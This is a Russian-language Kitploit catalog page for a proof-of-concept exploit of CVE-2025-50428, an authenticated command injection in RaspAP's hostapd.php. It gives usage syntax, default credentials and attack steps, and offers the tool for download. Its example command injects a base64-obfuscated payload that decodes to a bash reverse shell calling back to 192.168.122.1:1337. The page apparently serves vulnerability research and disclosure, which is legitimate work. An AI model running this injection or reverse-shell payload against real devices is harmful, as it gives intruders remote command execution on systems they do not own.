Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-50428 — Proof of concept for the vulnerability CVE-2025-50428: Authenticated OS Command Injection in RaspAP | Kitploit
Инструменты/GitHubGitHub/security-smarttecs/cve-2025-50428
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHubsecurity-smarttecs/cve-2025-50428

cve-2025-50428

Proof of concept for the vulnerability CVE-2025-50428: Authenticated OS Command Injection in RaspAP

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

CVE Severity Product Version

CVE-2025-50428 — Внедрение команд в RaspAP

Эксплойт для CVE-2025-50428, уязвимости внедрения команд в raspap-webgui 3.2.9 и более ранних версиях.


Идентификатор уязвимостиCVE-2025-50428
Степень серьезностиВысокая (CVSS 3.1: 8.6)
Вектор CVSSCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Тип уязвимостиВнедрение кода
Вектор атакиУдаленный (требуется аутентификация)
Необходимые привилегииНизкие
ВоздействиеВыполнение кода, повышение привилегий
Затрагиваемый продуктraspap-webgui ≤ 3.2.9
ОбнаруженоSmartTECS Cyber Security GmbH

Описание

Этот эксплойт направлен на уязвимость внедрения команд в скрипте hostapd.php RaspAP. Уязвимость возникает из-за некорректной санитизации пользовательского ввода, передаваемого через параметр interface. Аутентифицированный злоумышленник может внедрить произвольные команды ОС, что приведет к выполнению кода с привилегиями пользователя www-data.

Уязвимые версии

  • raspap-webgui ≤ 3.2.9

Требования

  • Python 3.x
  • Установленная библиотека requests
  • Цель, работающая на уязвимой версии RaspAP
  • Действительные учетные данные RaspAP

Использование

root@kitploit:~
python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]

Параметры

  • --base-url: Базовый URL установки RaspAP (например, http://192.168.122.22)
  • --interface: Значение для параметра interface, допускается полезная нагрузка внедрения
  • --username: Имя пользователя RaspAP (по умолчанию: admin)
  • --password: Пароль RaspAP (по умолчанию: secret)

Пример

root@kitploit:~
python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"

Принцип работы

  1. Скрипт аутентифицируется в веб-интерфейсе RaspAP, используя предоставленные учетные данные.
  2. Он получает действительный CSRF-токен с сервера.
  3. Отправляется POST-запрос к hostapd.php с параметром interface, содержащим вредоносную полезную нагрузку внедрения команд.
  4. Внедренные команды выполняются на целевой системе с привилегиями www-data.

Примечания

  • Эксплойт требует действительных учетных данных.
  • Успешная эксплуатация позволяет выполнять произвольные команды, которые могут быть использованы для повышения привилегий.

SmartTECS Cyber Security GmbH

SmartTECS Cyber Security GmbH — компания в области кибербезопасности, специализирующаяся на тестировании на проникновение, разработке безопасного программного обеспечения и исследовании уязвимостей. Компания предоставляет индивидуальные оценки безопасности, реагирование на инциденты и стратегические консультационные услуги, помогая организациям защитить критически важные системы от evolving киберугроз.

Отказ от ответственности

Данный инструмент предоставляется строго для образовательных и исследовательских целей. Используйте только на системах, которыми вы владеете или на которые имеете явное разрешение. Автор и SmartTECS Cyber Security GmbH не несут ответственности за неправомерное использование или нанесенный ущерб.

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2025-50428
Скачать инструмент